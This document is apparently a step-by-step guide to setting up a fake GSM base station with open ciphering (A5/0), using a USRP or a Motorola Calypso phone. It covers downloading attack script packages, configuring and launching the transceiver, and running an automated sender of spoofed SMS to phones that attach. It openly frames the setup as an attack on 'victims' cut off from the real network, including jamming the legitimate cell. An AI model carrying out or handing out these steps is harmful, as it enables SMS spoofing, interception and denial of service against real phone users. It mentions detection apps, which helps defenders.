- Fake base station with open ciphering named A5/0, and the network could be GSM(sms, call), and GPRS, EDGE
- local attack but could be targeting (to find local victim)
- victim couldn't be reached on the real network (indeed call and sms)
- could be detectable with rooted phone and application like imsi-catcher detector, snoopsnitch because of open network
- USRP
- motorola phone (aka calypso phone on google)
- LimeSDR
- Install DragonOS 29 or 30
- Create fake bts with open ciphering (A5/0)
- Modify the config.json to send sms with fake sms sender
- Solution 1 using USRP
(more stable and no need synchronization of existing BTS so if we jam the existing BTS the half mitm still exists)
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts.zip
unzip osmo-nitb-scripts.zip
cd osmo-nitb-scripts
Database is at : /var/lib/osmocom/hlr.sqlite3
Installing all config
bash install_services.sh
For avoiding lock database error
fuser -k /var/lib/osmocom/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
By
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Change spoof script2 modification
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please corret the help, change :
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running the transceiver
osmo-trx-uhd -C /etc/osmocom/osmo-trx-uhd.cfg
Running main_uhd associate with configs/openbsc.cfg
Compare the two configs openbsc_spoof.cfg and openbsc.cfg to find the difference.
Use command diff to compare two files
Results : With openbsc.cfg, not possible to send call and sms (just fake sms sender)
ctrl+shift+T
cd osmo-nitb-scripts
Compare the two scripts main_uhd_spoof.py and main_uhd.py to find the difference.
Use command diff to compare two files
Results : main_uhd_spoof.py uses openbsc_spoof.cfg and main_uhd.py uses openbsc.cfg
python3 main_uhd.py
Tape *#*#4636#*#* and choose GSM only on your Android phone
Search GSM network (on your phone), associate with PLMN MCC 001 && MNC 01
Tape *#001# for finding your phone number (extension with osmo-bts)
Configure config.json and test the ussd on it
python3 interact.py
For automated fake sms sender in each connection on the BTS Relaunch all setup but use this command instead of python3 main_uhd.py
python3 main_uhd.py -u -c config.json
- Solution 2 : using one motorola phone
(Not so stable and need synchronization of existing BTS by finding arfcn of synchronization so if we jam the existing BTS the half mitm doesn't exist anymore)
Hardware setup 1 : Need battery and not programmable with arduino
serial_cable smartspate sudonull
Hardware setup 2 : No need battery and programmable with arduino
Command you need :
dmesg | grep ttyUSB*
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts-calypsobts.zip
unzip osmo-nitb-scripts-calypsobts.zip
cd osmo-nitb-scripts-calypsobts
Tape *#*#4636#*#* and choose GSM only on your Android phone
Installing network signal guru on your android phone
And finding the arfcn that this one is connect
Let's name this arfcn as 975
Configure arfcn at service/osmotrx.lms as 975
gedit services/osmo-trx-lms3.service
Save the configuration
bash install_services.sh
For avoiding lock database error
fuser -k /var/lib/osmocom/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
By
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Change spoof script2 modification
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please corret the help, change :
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running transceiver
bash trx.sh
Click button power of motorola phone
Tape ctrl+shift+T
cd osmo-nitb-scripts-calypsobts
Database at : /usr/src/CalypsoBTS/hlr.sqlite3
Running main_uhd associate with configs/openbsc.cfg
Compare the two configs openbsc_spoof.cfg and openbsc.cfg to find the difference.
Use command diff to compare two files
Results : With openbsc.cfg, not possible to send call and sms (just fake sms sender)
Compare the two scripts main_spoof.py and main.py to find the difference.
Use command diff to compare two files
Results : main_spoof.py uses openbsc_spoof.cfg and main.py uses openbsc.cfg
python3 main.py
Tape *#*#4636#*#* and choose GSM only on your Android phone
Search GSM network (on your phone), associate with PLMN MCC 001 && MNC 01
Tape *#001# for finding your phone number (extension with osmo-bts)
Configure config.json and test the ussd on it
python3 interact.py
For automated fake sms sender in each connection on the BTS Relaunch all setup but use this command instead of python3 main.py
python3 main.py -u -c config.json